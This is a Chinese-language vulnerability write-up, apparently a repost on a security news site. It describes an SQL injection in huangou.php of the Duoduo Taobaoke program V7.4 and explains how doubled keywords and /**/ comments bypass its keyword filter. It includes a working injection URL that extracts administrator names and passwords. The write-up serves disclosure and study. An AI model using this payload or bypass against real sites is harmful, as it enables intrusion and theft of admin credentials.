多多淘宝客程序 V7.4 SQL注射绕过漏洞

admin 2021年4月3日20:00:18评论38 views字数 1089阅读3分37秒阅读模式

问题位置:

huangou.php ID过滤不严格

$id =$_GET[''id''];
$good=sel_sql(‘dhlist’,''id,name,pic,money,jifen,num,content,num’,''id=’.$id);

详细说明:

7.4 3月20号之前的代码,注入确实没修,huangou.php

$id =$_GET[''id''];
$good=sel_sql(‘dhlist’,''id,name,pic,money,jifen,num,content,num’,''id=’.$id);

测试环境射不了,仔细看代码,多了个包含

include_once ‘comm/checkpostandget.php’;

文件内容:

$ArrFiltrate = array ( “#union#i”, “##i", "#select#i", "#alert#i", 
"#javascript#i", "#
$value) { if (is_array($value)) FunStringExist($array
[$key],$ArrFiltrate,$replacements); else $array[$key] = preg_replace
($ArrFiltrate, $replacements, $value); } }}FunStringExist
($_GET,$ArrFiltrate,$replacements);FunStringExist
($_POST,$ArrFiltrate,$replacements);

get和post数组的全局过滤函数,逻辑存在很大问题。

漏洞证明:

关键字例如:union,变成uniounionn就行了,空格用/**/替代,再次完成SQL注射。

http://www.sitedirsec.com/huangou.php?id=1/**/and/**/1=2/**/ununionion/**/seselectlect/**/0,1,2,adminname,adminpass,5,6,7/**/from/**/duoduo_duoduo2010


摘自:http://www.dis9.com/viewthread.php?tid=1750

文章来源于lcx.cc:多多淘宝客程序 V7.4 SQL注射绕过漏洞

相关推荐: 接上一章节,支付宝木马,后续情节

上集剧情: 360对你真的起作用了吗?bypass....分析支付宝网银木马,反爆菊花 本集继续: 感谢 @黑匣子 @zazaz @EDI @liyang @小胖子 @Mujj @xsser @法海 @倒霉熊 @可爱得啦大仙 等人的帮助,基本上已经摸透了。。。…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日20:00:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   多多淘宝客程序 V7.4 SQL注射绕过漏洞https://cn-sec.com/archives/324832.html

发表评论

匿名网友 填写信息